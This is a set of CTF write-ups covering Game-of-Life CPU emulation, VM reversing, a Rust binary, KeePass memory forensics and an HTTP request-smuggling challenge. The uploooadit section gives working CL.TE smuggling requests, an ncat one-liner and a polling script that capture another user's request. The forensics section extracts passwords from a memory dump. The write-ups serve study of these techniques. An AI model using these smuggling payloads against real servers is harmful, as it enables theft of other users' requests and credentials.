defcon 2020 quals – fountain_ooo_relive

fountain-ooo-reliving

Problem description

We have found the fountain OOO RElive. By discovering its secrets, you will restart the game of life with a chance to do it all over again. This challenge is in memory of John Conway (26 December 1937 – 11 April 2020).

input

We are given a file, which seems to be a game of life state.

The hint at the top of the file # GOOOlly its the Fountain OOO REliving pointed us to the Golly game-of-life simulator. When you feed the file into golly, it shows a diagram (initial state) of what seems like a CPU layout.

initial observation

The diagram can be divided into 4 parts:

  • Top left corner: ROM
  • Top right corner: RAM
  • Bottom right corner: Logic (ALU and CU)
  • Bottom left corner: instruction memory

There are various etching marks written on near each component, labeling them and adding other clues, such as direction of fetching, composition of each instruction, or instruction Op-Code names.

The memory regions (RAM, ROM, instructions), seem to be composed of individual cells (fuses, memory-cells), which have a distinct pattern. When looking closely we can see that there are two patterns to each type of memory, presumably cells representing Zero and cells representing One.

the plan

  1. Use a tool to parse each of the memory regions in the diagram, in order to convert the pictures of cells to a bit stream, where each cell was converted into a bit.
  2. Understand how the instructions should be interpreted and emulate a run of these instructions.
  3. See what comes out and continue from there.

the tools

We used OpenCV as our image processing application, and python as our emulator. We also used The Gimp in order to view a zoomed version of the picture, alongside the individual pixel coordinates.

image processing phase

chopping up the image

At first, using a regular screen-shot cutting tool, we cut out the interesting parts of the diagram, e.g. a rectangle containing the ROM and a rectangle containing the Instructions.

ROM:

Instructions:
alt text

choosing reference cells

Next we opened the picture in the Gimp in order to determine the start location, height and width of each cell. We chose two different looking cells, and labelled one of them Zero and the other One. These two cells are our reference cells, they will be used to compare to all other cells in order to determine which of them are a Zero and which a One.

Example of Rom reference cells:

Example of Instruction reference cells:

This is the code to extract the reference cells.
For ROM:

main_img = cv2.imread('rom.png', cv2.IMREAD_GRAYSCALE)

main_height, main_width = main_img.shape

print(main_width, main_height)
start_offsetx = 9
start_offsety = 17

bit_width = 4
bit_height = 4

skip_height = 7
skip_width = 11

offsetx = start_offsetx
offsety = start_offsety


zero_pattern = main_img[offsety:offsety + bit_height, offsetx:offsetx + bit_width]
one_pattern = main_img[offsety+bit_height+skip_height:offsety + bit_height*2 +
        skip_height, offsetx:offsetx + bit_width]

and Instructions:

main_img = cv2.imread('instructions.png', cv2.IMREAD_GRAYSCALE)

main_height, main_width = main_img.shape

print(main_width, main_height)
start_offsetx = 10
start_offsety = 7

bit_width = 10
bit_height = 3

skip_height = 8
skip_width = 11

offsetx = start_offsetx
offsety = start_offsety


one_pattern = main_img[offsety:offsety + bit_height, offsetx:offsetx + bit_width]
zero_pattern = main_img[offsety+bit_height+skip_height:offsety + bit_height*2 +
        skip_height, offsetx:offsetx + bit_width]

reading and parsing whole memory block

This is the code for ROM which iterates over the whole memory block, converting the pictures into a bit stream:

rom = []
while offsetx < 3204:
    offsety = start_offsety
    column_bits = []
    while offsety < 121:
        if numpy.array_equal(one_pattern, main_img[offsety:offsety + bit_height,
            offsetx:offsetx + bit_width]):
            column_bits.append(1)
        elif numpy.array_equal(zero_pattern, main_img[offsety:offsety + bit_height,
            offsetx:offsetx + bit_width]):
            column_bits.append(0)
        else:
            print("ERROR!!!! doesn't match zero or one: %d, %d" % (offsetx, offsety))
            cv2.imshow("", main_img[offsety:offsety + bit_height, offsetx:offsetx + bit_width])
            cv2.waitKey(0)
            exit()



        offsety += bit_height + skip_height

    column_bits = list(reversed(column_bits))
    rom.append(bits_to_num(column_bits))

    offsetx += skip_width

print(list(reversed(rom)))

Parsing of the instructions was done similarly, only here we also had to dissect each column of bits into the various components of an instruction. We used the etched hints in order to divide each instruction.

result of ROM parsing

The rom parsing turned out to be non-interesting. It consists of 290 words holding the numbers from 0 to 290 respectively.

dissecting the instructions

It was a bit hard to determine from the diagram exactly where each component begins and where it ends (i.e. how many bits to allocate to each component), so we experimented slightly with the sizes until the result seemed to make sense.

Our chosen disection was:

opcode arg1 value arg1 mode arg2 value arg2 mode arg3 value arg3 mode
num bits: 4 16 2 16 2 16 3

The code for disection the function is:

instructions = []
while offsetx < 1275:
    offsety = start_offsety
    column_bits = []
    while offsety < 649:
        if numpy.array_equal(one_pattern, main_img[offsety:offsety + bit_height,
            offsetx:offsetx + bit_width]):
            column_bits.append(1)
        elif numpy.array_equal(zero_pattern, main_img[offsety:offsety + bit_height,
            offsetx:offsetx + bit_width]):
            column_bits.append(0)
        else:
            print("ERROR!!!! doesn't match zero or one: %d, %d" % (offsetx, offsety))


        offsety += bit_height + skip_height

    column_bits = list(reversed(column_bits))
    offset = 0
    opcode_width, value_width, mode_width = 4, 16, 2
    opcode = bits_to_num(column_bits[offset:offset + opcode_width])
    offset += opcode_width
    arg1_val = bits_to_num(column_bits[offset:offset + value_width])
    offset += value_width
    arg1_mode = bits_to_num(column_bits[offset:offset + mode_width])
    offset +=  mode_width
    arg2_val = bits_to_num(column_bits[offset:offset + value_width])
    offset += value_width
    arg2_mode = bits_to_num(column_bits[offset:offset + mode_width])
    offset +=  mode_width
    arg3_val = bits_to_num(column_bits[offset:offset + value_width])
    offset += value_width
    arg3_mode = bits_to_num(column_bits[offset:offset+ mode_width + 1])
    offset +=  mode_width

    instructions.append((opcode, arg1_val, arg1_mode, arg2_val, arg2_mode, arg3_val,
        arg3_mode))

    offsetx += skip_width


instructions = list(reversed(instructions))

Understanding the instructions

Now that we had all instructions parsed, we had a look at them in sequence. We see 115 instructions with opcodes 1, 3 and 6.

For example:

[0]     06      0000:0  0000:0  0002:4
[1]     01      ffff:0  6573:0  0002:4
[2]     01      ffff:0  38da:0  0003:4
[3]     01      ffff:0  57ad:0  0004:4
[4]     01      ffff:0  6343:0  0005:4
[5]     01      ffff:0  0e9f:0  0006:4
[6]     01      ffff:0  344f:0  0007:4
[7]     01      ffff:0  2f1b:0  0008:4
[8]     01      ffff:0  09fa:0  0009:4
[9]     01      ffff:0  3dcf:0  000a:4
...

[50]    03      0027:1  0007:1  0007:4
[51]    06      0001:1  df6d:0  0027:4
[52]    03      0027:1  0008:1  0008:4
[53]    06      0001:1  fa79:0  0027:4
[54]    03      0027:1  0009:1  0009:4
[55]    06      0001:1  ce20:0  0027:4
[56]    03      0027:1  000a:1  000a:4
[57]    06      0001:1  e79d:0  0027:4
[58]    03      0027:1  000b:1  000b:4
[59]    06      0001:1  b6db:0  0027:4
[60]    03      0027:1  000c:1  000c:4
...

[108]   03      0027:1  0024:1  0024:4
[109]   06      0001:1  c763:0  0027:4
[110]   03      0027:1  0025:1  0025:4
[111]   06      0001:1  aac7:0  0027:4
[112]   03      0027:1  0026:1  0026:4
[113]   01      ffff:0  fffe:0  0000:4
[114]   01      0000:0  0000:0  0000:4

By looking at the etching near the Control Unit , and a bit of educated guessing, it seems that the opcodes mean:

opcode mnemonic operation
1 MLZ Move if less than zero
3 SUB Subtract
6 XOR Exclusive Or

Judging by the size of the values, and guessing that lower number may refer to registers/ram addresses while larger numbers are more likely immediate values. The mode bits, for the first two operands seem to be:

mode meaning
0 immediate value
1 register number

emulating the instructions

We wrote the following code to emulate the instructions:

def emulate_instructions():
    registers = [0] * 72
    for j, i in enumerate(instructions):
        print("[%d]" % j +  "\t%02x\t%04x:%x\t%04x:%x\t%04x:%x" % i)
        opcode, a1, a1m, a2, a2m, a3, a3m = i
        op1 = a1 if a1m == 0 else registers[a1]
        op2 = a2 if a2m == 0 else registers[a2]
        if opcode == 6:
            registers[a3] = op1 ^ op2
        elif opcode == 1:
            if unsigned_to_signed(op1) < 0:
                registers[a3] = op2
            else:
                pass
        elif opcode == 3:
            registers[a3] =  (op1- op2) & 0xffff

After running this we looked at the resulting memory (the values in the registers), to see if it is leading us somewhere.
The data was taking shape, so we felt that we are getting somewhere, but the result made no sense so we understood that we were still missing something.

the missing register

Looking at the instruction list can be broken down to:

  1. The first 38 instructions initialize the registers from 2 to 39 with immediate values.
  2. The next instructions perform some kind of hashing function, consisting of Xors and Subtraction on the registers.

Something we found is that register 1 is used in the hashing phase, but as opposed to all other registers it is never initialized in the initialization phase.

Since thre registers are only 16 bits wide, we decided to brute force all possible values for an initialized register 1, and see what we get. The updated code is as follows:

def emulate_instructions(secret):
    registers = [0] * 72
    registers[1] = secret
    for j, i in enumerate(instructions):
        # print("[%d]" % j +  "\t%02x\t%04x:%x\t%04x:%x\t%04x:%x" % i)
        opcode, a1, a1m, a2, a2m, a3, a3m = i
        op1 = a1 if a1m == 0 else registers[a1]
        op2 = a2 if a2m == 0 else registers[a2]
        if opcode == 6:
            registers[a3] = op1 ^ op2
        elif opcode == 1:
            if unsigned_to_signed(op1) < 0:
                registers[a3] = op2
            else:
                pass
        elif opcode == 3:
            registers[a3] =  (op1- op2) & 0xffff
    return registers

for secret in range(0xffff):
    registers = emulate_instructions(secret)
    out = b""
    for r in registers:
        out += struct.pack("<H", r)

    with open("results/%x.out" % secret, "wb") as fout:
        fout.write(out)

searching for the flag

Seeing that we know the flag starts with “OOO”, we searched all of our 65535 result files for that string:

$ grep -a OOO results/*
results/107.out:_/_?Ok/yOy_qo|QUoOOOqiOeObu1^1qOgO^mQ
results/12f.out://7OC/'\_qQmW7OwqO}OJ]1WFOW1]q_WOOOFQ
results/1fd.out:.N/Cu?p_VR?     POOO_1P2
                                        qH_O!P:
results/2117.out:!OOOO/{Oi_isQ_lif1e_/_Qyo/u/re_Qon_/oQuQr_o/w/n}1_
results/4117.out:AOoOOO{oinQ_othQis_Qlifeo_Q__yourOe_qoQn_yoqur_OownO}

The flag

The result of file 4117.out seems suspiciously close to the expected flag format.
We obviously still have errors in our code, seeing that there are a few extra characters sprinkled throughout the flag string, but this was enough for us to guess the correct flag:
OOO{in_this_life__youre_on_your_own}

The full python script usef for the solution can be found here.

defcon 2020 quals – uploooadit

Defcon Quals – uploooadit challenge

We started off with a website https://uploooadit.oooverflow.io/ and 2 source files.

App.py – backend source code, just a simple server which supports reading files from AWS S3 bucket and creating files on AWS S3 bucket.

Store.py – Implementation for the actions I mentioned above.

TL;DR

We successfully performed http request smuggling by causing desync between the Gunicorn backend to the HAProxy.

By injecting arbitrary content to another’s request, we forced the next request to be http POSTDATA sent to the server, storing the target’s request. Afterwards, we read it. By doing so, we managed to get the flag, which is sent through http post request to the backend server.

How we got there?

We started off with the source code, looking for some vulnerabilities, trying to think of ways to solve the challenge.

import os
import re

from flask import Flask, abort, request

import store

GUID_RE = re.compile(
    r"\A[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\Z"
)

app = Flask(__name__)
app.config["MAX_CONTENT_LENGTH"] = 512
filestore = store.S3Store()

# Uncomment the following line for simpler local testing of this service
# filestore = store.LocalStore()


@app.route("/files/", methods=["POST"])
def add_file():
    if request.headers.get("Content-Type") != "text/plain":
        abort(422)

    guid = request.headers.get("X-guid", "")
    if not GUID_RE.match(guid):
        abort(422)

    filestore.save(guid, request.data)
    return "", 201


@app.route("/files/<guid>", methods=["GET"])
def get_file(guid):
    if not GUID_RE.match(guid):
        abort(422)

    try:
        return filestore.read(guid), {"Content-Type": "text/plain"}
    except store.NotFound:
        abort(404)


@app.route("/", methods=["GET"])
def root():
    return "", 204

By examining the server source, we can easily notice two things:

  • We can read any file with a given GUID (get_file function)

  • We can upload any file with some GUID as filename (add_file function).

We tried few different ways to get the flag for several hours (AWS S3 bucket misconfigurations, finding vulnerabilities within the code etc.) but without any success.

Until we noticed the following http headers returned from the server:

Server: gunicorn/20.0.0
Via: haproxy

And then it came to us! We remembered an article by Nathan Davison, which describes http request smuggling attack against HAProxy – Gunicorn server (which is pretty much the solution for the challenge).

The concept is described pretty well at Nathan’s article & article by portswigger, but still, I’ll explain the main concept with a simple example.

HTTP Request Smuggling is an attack vector caused by inconsistency between frontend & backend servers when parsing http request’s ‘data transfer’ behavior over a connection. You can use Content-Length header to specify the exact length of the request, or ‘Transfer-Encoding: chunked’ to send file over a single TCP connection by sending multiple chunks. Usually, this kind of attack happens when messing with those headers. This “inconsistency” of parsing leads to arbitrary data being injected to the next request in the frontend / backend server.

For example, the frontend server might parse http request using Content-Length header, but the backend server parse the request using Transfer-Encoding (CL.TE vulnerability).

By sending the following request:

POST / HTTP/1.1
Host: example.com
Content-Length: 9
Transfer-Encoding: chunked

0

DATA

The frontend server will transfer the request to the backend server using Content-Length (“0\r\n\r\nDATA”). If the backend server would parse the request using Transfer-Encoding header, it will encounter 0 which resembles the last chunk of the request. Then, “DATA” will be pre-appended to the next request over the same connection (“DATAGET / HTTP/1.1”).

The scenario in uploooadit was similar. As written in Nathan’s article, by sending both Transfer-Encoding & Content-Length headers, with additional \x0C character in the TE header, we can cause this inconsistency.

By sending the following request:

POST /files/ HTTP/1.1
X-guid: 10000000-0000-0000-0000-000000000000
Content-Type: text/plain
Host: uploooadit.oooverflow.io
Content-Length: 9
Transfer-Encoding:[\x0c]chunked

0

DATA

The frontend server will use the Content-Length header to parse the request, but the backend server will use Transfer-Encoding.

As explained before, as the backend server receives ‘0’, it stops to receive more chunks. Then, the rest of the data pre-appended to the next request (which is in the same TCP connection)!

Soo… what can we do next?

The next thing we thought of was stealing someone’s request. So we’ll abuse the upload file feature by appending http post request to /files/, with the victim’s request as POSTDATA. Maybe, by doing so, we’ll get some valuable information.

Proof of Concept:

printf 'POST /files/ HTTP/1.1\r\nX-guid: 10000000-0000-0000-0000-000000000000\r\nContent-Type: text/plain\r\nHost: uploooadit.oooverflow.io\r\nContent-Legth: 128\r\nTransfer-Encoding:\x0cchuncked\r\n\r\n0\r\n\r\nPOST /files/ HTTP/1.1\r\nX-guid: 30000000-0000-0000-0000-000000000000\r\nContent-Type: text/plain\r\nContent-Length: 395\r\n\r\n390\r\n' | ncat --ssl uploooadit.oooverflow.io 443

or:

POST /files/ HTTP/1.1
X-guid: 10000000-0000-0000-0000-000000000000
Content-Type: text/plain
Host: uploooadit.oooverflow.io
Content-Length: 9
Transfer-Encoding:[\x0c]chunked

0

POST /files/ HTTP/1.1
X-guid: 30000000-0000-0000-0000-000000000000
Content-Type: text/plain
Content-Length: 390

390

So, the next request will be ( is the victim’s request):

POST /files/ HTTP/1.1
X-guid: 30000000-0000-0000-0000-000000000000
Content-Type: text/plain
Content-Length: 395

390
<DATA>

By reading 30000000-0000-0000-0000-000000000000 file:

import requests
import time

def get():
    headers = {"Content-Type":"text/plain"}
    r = requests.get("https://uploooadit.oooverflow.io/files/30000000-0000-0000-0000-000000000000",headers = headers, verify=False, timeout=5)
    print(r.status_code)
    print(r.text)

while True:
    time.sleep(1)
    try:
        get()
    except:
        continue

We got as output:

POST /files/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: invoker
Accept-Encoding: gzip, deflate
Accept: */*
Content-Type: text/plain
X-guid: 8328508c-8de9-43cd-8e08-5b9c7c45f552
Content-Length: 152
X-Forwarded-For: 127.0.0.1

Congratulations!
OOO{That girl thinks she's the queen of the neighborhood/She's got the hottest trike in town/That girl, she holds her head up so high}

And we got the flag! =)

Summary

At first glance, http request smuggling attack seems not so powerful. But, this challenge showed us very powerful exploitation vector.

In the wild, this kind of bug might lead to cookie theft, trigger xss vulnerabilities or even remote code execution.

mama_bear

Mama Bear


We did not finish the task on time

We received mama_bear binary – who received 2 inputs – password and secret, and return the output, which looks similar to the output in the description. After some reversing, we realized that it’s a vm – having an instruction set and a correlated operation. The instructions were pop, push, ror, return and a weird one we called mutate. They are all defined in run_program function:

pop:


push:


ror:


return:


mutate:



Here is some code of main function to run them all:


The instruction stream (stream of instructions for the main function to use in the vm):


The spread_table to be used by mutate:


The function to generate spread_table for each run program:


So – we implemented the functions above in python, and given a password and secret we successfully returned the same result as the mama_bear binary.






Now – we need to implement the reverse functions:

pop is the exact reverse of push.

rol is the exact reverse of ror:


But mutate has no obvious reverse. Furthermore, mutate loses information – it is setting/unsetting/remaining the bit according to the spread_table – so we created a hashmap of all mutate options (src[al,bl] -> target[al,bl]), which we created to use in mutate_reverse:




We have to set the pc before running each reversed program:


And now we have a reversed run_program. (We confirmed it by running the program and reverse_program and have no changes on the input). All we need to do next, is inserting the target output as an input to our reversed function, and brute force the password, until it outputs this string format: HackTM{.*}

hackdex

HackDex Writeup

The challenge starts by having 2 files:
– hackdex, ELF file.
– hacktm.hdex, text file.

Description

Considering your possible trip to Timisoara in May, we thought it is not a bad idea to support you with a simple English to Romanian dictionary program. Today we’re releasing a preview version for you to test. Please keep in mind that it’s still in development

Overview

The hackdex file is an executable file which is essentially a EN-RO dictionary.
When we run the file we get:

Welcome to HackDex. Your EN-RO dictionary for HackTM CTF!


    Options:
    1. Translation console
    *. Exit
hackdex>   

When pressing ‘1’ we can type words followed by ENTER and we get their translation in Romanian:

hackdex(1)> a
a -> un, o; un/o oarecare; o singura; pe; perfect; un singur
hackdex(1)> 

As for the hacktm.hdex, this file is the dictionary used by the hackdex ELF to translate to English words into a Romanian:

Some of the hacktm.hdex’s content

a<br>un, o; un/o oarecare; o singura; pe; perfect; un singur
aardvark<br>porcul termitelor (orycteropus sp.)
aaron<br>aaron; prelat, inalta fata bisericeasca
aba<br>aba;dimie
abac<br>grafic; filet conic pentru tevi standardizat in S.U.A.; abaca
abaca<br>canepa de manila; abaca
aback<br>inapoi; in urma
abacus<br>numaratoare; abaca; abac
abaddon<br>gheena, iad
abaft<br>in urma; in spatele; la; spre pupa
abandon<br>parasire; abandon; a abandona; a parasi; a renunta la; a inceta sa
abandoned<br>parasit; dezmatat; desfrinat
abandonment<br>parasire; abandon
abase<br>a retrograda; a degrada
abasement<br>retrogradare; degradare
abash<br>a umili; a face de rusine; a descumpani
abashed<br>rusinat; jenat
abashment<br>umilinta; stinghereala; jena; rusine
abask<br>la soare
abate<br>a toci,; a slabi; a abroga; a anula; a atenua (o durere etc.); a face bont; a pune capat la; a reduce (preturile); a se atenua; a se domoli; a se potoli
abatement<br>slabire; reducere (a unui impozit); abrogare; anulare; atenuare

Reversing

When starting to reverse the challenge we noticed it was written in rust which made it more challenging as we were less familiar with it.

After reversing the main function we noticed there is a variable called “_ZN3dex11PRO_VERSION17h62387400d9c485dbE” which indicate us there was a PRO_VERSION for this program and with some added functionality.
After cross-referencing this variable we saw this value is checked against the 0x1337 value:


This check is happening in the “extra” function which is called whenever the user is pressing “9” instead of “1” mentioned above:

The translate function is the function where the program does its dictionary logic.
As we can see in the above picture, whenever the user is pressing “9” it is essentially changing the application from being dictionary to whatever the extra function does.

So what causes the PRO_VERSION to be 0x1337?


The code simply check the amount of time passes between some assignments and put that value in the PRO_VERSION variable.
So after patching the variable with the correct value and pressing “9”, we get to the “extra” function.

So after a while of reversing the function we got to the following conclusions:

  • This function has 6 stages, and each of these stages is:
    • Initalizing a new boggle board.
    • Calling the get_valid_words function.
    • Receiving from the user a word.
    • Validating the word received is in the hashtable returned by the get_valid_words function.
    • In case of success continue to next step.
  • At the end of these stages the function concatenates all words received together.
  • Calculate the SHA256 hash of the complete string and compare it to hardcoded hash in the binary.
  • In case the hash is matching we uses the concatenated words as to key to decipher chacha encrypted cipher which presumably is the flag.

There was a problem which the binary did not had the logic of the get_valid_words function implemented which caused us a lot of headache understanding that the binary was not supposed to work at all in the first place, as we thought we simply did not understand the rust compiled assembly correctly.

Another obstacle was to understand the building of the boggle words from the binary because they were mostly using the xmm instruction-set.

After understanding the binary is not fully implemented and not supposed to work, we patched the checks that were standing in our way and got to the point where we were able to insert words and continue to the hash logic.

The solution

So after we extracted the Boggle boards created in each step, we wrote a script that automatically find all the possible words that fits into a given board.

[s@workstation Hackdex]$ python2 sol_1.py 
Z E L 
A N N 
R I G 

'get_words' 0.00 sec
T K L 
B U I 
N R F 

'get_words' 0.00 sec
F R I 
P E N 
U A D 

'get_words' 0.00 sec
E M Z 
B N A 
X E H 
W T V 

'get_words' 0.00 sec
E V O 
R U X 
C O M 
G N I 

'get_words' 0.00 sec
P L Z 
A S I 
S O N 

'get_words' 0.00 sec

One important note here is that in order to find the relevant words that fits into the boards, we used the dictionary we got from the CTF (hacktm.hdex) as our words list.

After receiving the words we created a script that will iterate through all the possibilities and check the hash of the concatenated words and match it against the hash in the binary.

wannabe = "F550BAA8068D9C17669E140626A9D7BF13EF0A66662AEB5910FC406BE196A287".lower()
num_of_iterations = 1

for i in range(6):
    num_of_iterations = num_of_iterations * len(words[i])

current_iteration = 0
for a in words[0]:
    for b in words[1]:
        for c in words[2]:
            for d in words[3]:
                for e in words[4]:
                    for f in words[5]:
                        current_iteration += 1
                        if current_iteration % 1000000 == 0:
                            print("{}/{}".format(current_iteration, num_of_iterations))
                        full = "{}{}{}{}{}{}".format(a,b,c,d,e,f)
                        try:
                            hashed = sha256(full.encode()).hexdigest()

                            if hashed == wannabe:
                                print(full)
                                exit(1)

                        except Exception as e:
                            pass

When we found a match we used that combination as the key in the chacha cipher and found the flag!

Find My Pass

Find My Pass

The Challenge

I managed to forget my password for my KeePass Database but luckily I had it still open and managed to get a dump of the system’s memory. Can you please help me recover my password?

https://ctfx.hacktm.ro/

I should mention that the actual task was to find password protected files, and not to find the actual password.

Challenge Overview

We receive a zipped HackTM.vmem file. A vmem file, is created by VMWare during a snapshot, and has a complete image of the machines memory. This format can be parsed using Volatility

Solution Walkthrough

When receiving any memory image, the first step should always be to run it through the volatilty imageinfo plugin:

$ python vol.py -f HackTM.vmem imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86 (Instantiated with Win7SP1x86)
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/Users/ilyam/Desktop/HackTM/findmypass/HackTM.vmem)
                      PAE type : PAE
                           DTB : 0x185000L
                          KDBG : 0x82b7cb78L
          Number of Processors : 2
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0x80b96000L
                KPCR for CPU 1 : 0x807ca000L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2019-11-11 20:50:09 UTC+0000
     Image local date and time : 2019-11-11 12:50:09 -0800


For this CTF all we actually need is the profile

Win7SP1x86

According to the challenge we should be looking for information about KeePass, and how it saves files. First things first, lets see what is running in memory:

$ python vol.py --profile=Win7SP1x86 -f HackTM.vmem pslist
Volatility Foundation Volatility Framework 2.6.1
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x84a41800 System                    4      0     97      410 ------      0 2019-11-11 20:49:19 UTC+0000
0x8625aa30 smss.exe                280      4      5       30 ------      0 2019-11-11 20:49:19 UTC+0000
0x863c5d20 csrss.exe               380    360      9      632      0      0 2019-11-11 20:49:22 UTC+0000
[snip]
0x86dccc08 WmiPrvSE.exe           3228    664     14      330      0      0 2019-11-11 20:49:34 UTC+0000
0x86e1b810 KeePass.exe            3620   1988     10      251      1      0 2019-11-11 20:49:46 UTC+0000
0x86e844f0 WmiApSrv.exe           3716    484      7      122      0      0 2019-11-11 20:49:47 UTC+0000
0x85861678 mobsync.exe            2260    664      8      163      1      0 2019-11-11 20:49:55 UTC+0000
0x86a8f030 cmd.exe                3372   1676      0 --------      0      0 2019-11-11 20:50:09 UTC+0000   2019-11-11 20:50:09 UTC+0000
0x86ec7588 conhost.exe            2520    380      0       30      0      0 2019-11-11 20:50:09 UTC+0000   2019-11-11 20:50:09 UTC+0000
0x86611870 ipconfig.exe           3472   3372      0 --------      0      0 2019-11-11 20:50:09 UTC+0000   2019-11-11 20:50:09 UTC+0000

As we can see, KeePass is using PID 3620, lets open it using volshell, and traverse the process memory (case sensitive):

$ python vol.py --profile=Win7SP1x86 -f /Users/ilyam/Desktop/HackTM/findmypass/HackTM.vmem -p 3620 volshell
Volatility Foundation Volatility Framework 2.6.1
>>> print '\n'.join([str(obj.Object("String", offset=hit, vm=proc().get_process_address_space(), encoding='utf8', length=7)) for hit in proc().search_process_memory(["keepass"])])
keepass
keepass
keepass
keepass
keepass
keepass
keepass 

Alternatively, we can dump the process memory and reverse it using grep:

$ python vol.py --profile=Win7SP1x86 -f HackTM.vmem -p 3620 memdump --dump-dir ./findmypassctf
$ strings ./findmypassctf/3620.dmp | grep -i "keepass"
KeePass
"C:\Program Files\KeePass Password Safe 2\KeePass.exe" "C:\Users\HackTM\Desktop\Database.kdbx"
C:\Program Files\KeePass Password Safe 2\KeePass.exe
C:\Program Files\KeePass Password Safe 2\KeePass.exe
KeePass.exe
keepass.exe
<assemblyIdentity name="KeePass"
KeePass.XmlSerializers.dll
keepass.xmlserializers.dll
[snip]
C:\Program Files\KeePass Password Safe 2\KeePass.exe
C:\Users\HackTM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\KeePass 2.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KeePass 2.lnk
KeePass.exe
KeePass.exe
KeePass.exe
KeePass.exe
KeePass.exe
KeePassPasswordSafe2_is1
KeePass 2 PreLoadz
C:/Program Files/KeePass Password Safe 2/KeePass.exeS

You could also use cat, with the -a flag on grep.

Digging through the process memory dump we stumble upon a familiar format:

$ strings ./findmypassctf/3620.dmp | grep -ia -C 5 "<KeePassFile>"
mUDQ
aB0t
(txYMc
.r+;
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<KeePassFile>
<Meta>
<Generator>KeePass</Generator>
<HeaderHash>jtMppK6LKKkQnA9qVS7rmOgz+OCXof3RS5m9vncRyWs=</HeaderHash>
<DatabaseName>Database</DatabaseName>
<DatabaseNameChanged>2019-10-28T10:27:15Z</DatabaseNameChanged>

So we expand the view, to see the whole structure, and under the we find an encoded base64 string:

>>> print '\n'.join([str(obj.Object("String", offset=hit, vm=proc().get_process_address_space(), encoding='utf8', length=50000)) for hit in proc().search_process_memory(["<Kee"])])
<KeePassFile>
[snip]
        <Binaries>
            <Binary ID="0" Compressed="True">H4sIAAAAAAAEADOv2rNeXYaBJVjO5kkAAwRUQelFJyPiO896PZrd7K4j+kfLkvmKmGiMdKpGzb0dU8/Gxd8TEn2udD81bH1VA2emxt0sxy+7KyVrf0d2dp/66vX0TJtxqJtyHNOuG48dP+iJ8QaJrtz38MA/RhY2BkbOAAZ2bkYGJhW2j+yMXMHsPY6Bi3b84C1SVGRkYGTg8fFg4OBi/Gj6uYSBgZVRkpMBBgQVGfIY8hlKGDIYMoGsdCCdylAExHpAsQogZmCQZGJgEOFiZJgb4veqovcqoygbI4MCWDMAJqpejOoAAAA=</Binary>
            <Binary ID="1" Compressed="True">H4sIAAAAAAAEADOv2rNeXYaB5WrEgbAABgiogtJBxj41dbf4r309apB3Vdd/3tyLXBXtMw7rTqrUuTZ1q+iZtqKjnyU0vsVrPFnuMe+Ckdr59NkreM5ELHzbm9L8zd/h6tu9fv5NR0ImFHv3vPtScP6Gi93OvYwsbAyMnAEM7NyMDEwqbB/ZGbmC2XMFM+7Pkay7rqjIyMDIwOPjwcDBxfjR9HMJAwMroyQnAwwIKjLkMeQzlDBkMGQCWelAOpWhCIj1gGIVQMzAIMnEwCDCxcgwN8TvVUXvVUZRNkYGBbBmADqAaWnqAAAA</Binary>
        </Binaries>
        <CustomData />
    </Meta>

[snip]

Copying the first string, we decode it:

$ echo "H4sIAAAAAAAEADOv2rNeXYaBJVjO5kkAAwRUQelFJyPiO896PZrd7K4j+kfLkvmKmGiMdKpGzb0dU8/Gxd8TEn2udD81bH1VA2emxt0sxy+7KyVrf0d2dp/66vX0TJtxqJtyHNOuG48dP+iJ8QaJrtz38MA/RhY2BkbOAAZ2b4C1SVGRkYGTg8fFg4OBi/Gj6uYSBgZVRkpMBBgQVGfIY8hlKGDIYMoGsdCCdylAExHpAsQogZmCQZGJgEOFiZJgb4veqovcqoygbI4MCWDMAJqpejOoAAAA=" | base64 -d > flag
$ file flag
flag.gz: gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 234
$ mv flag flag.gz

Opening it the flag.gz archive, generates another file – “flag”, which we read using a text editor:

$ file flag
flag.7z: 7-zip archive data, version 0.4
$ mv flag flag.7z

opening this file pops a password prompt:


digging around the memory dump for the password proved fruitless, so we started to go through other artifacts in memory. Coming across the clipboard artifact, we found a strange string:

$ python vol.py --profile=Win7SP1x86 -f /Users/ilyam/Desktop/HackTM/findmypass/HackTM.vmem clipboard -v
Volatility Foundation Volatility Framework 2.6.1
Session    WindowStation Format                 Handle Object     Data
---------- ------------- ------------------ ---------- ---------- --------------------------------------------------
[snip]
0xffbb46bc  64 00 6d 00 56 00 5a 00 51 00 6d 00 64 00 7a 00   d.m.V.Z.Q.m.d.z.
0xffbb46cc  4f 00 6c 00 55 00 72 00 63 00 45 00 42 00 6c 00   O.l.U.r.c.E.B.l.
0xffbb46dc  52 00 6a 00 38 00 37 00 64 00 48 00 51 00 33 00   R.j.8.7.d.H.Q.3.
0xffbb46ec  55 00 53 00 56 00 42 00 49 00 6e 00 00 00         U.S.V.B.I.n...
[snip]

extracting “dmVZQmdzOlUrcEBlRj87dHQ3USVBIn” and trying it in the password prompt, a file name “nothinghere.txt” containing the flag is extracted:

HackTM{d14c02244b17f4f9dfc0f71ce7ab10e276a5880a05fca64d39a716bab92cda90}

Success!

count-on-me

Description:

There is no description for the challenge. The zip file includes three resources:

  • challenge.txt – gives us the encryption scheme – AES 256 CBC mode, iv, and ciphertext to decrypt
  • aes.py – simple example of how to use Crypto.Cipher to encrypt/decrypt in Python
  • key.png – presumably a representation of the key


What seems to be the challenge is to derive the key from key.png and decipher the ciphertext from challenge.txt

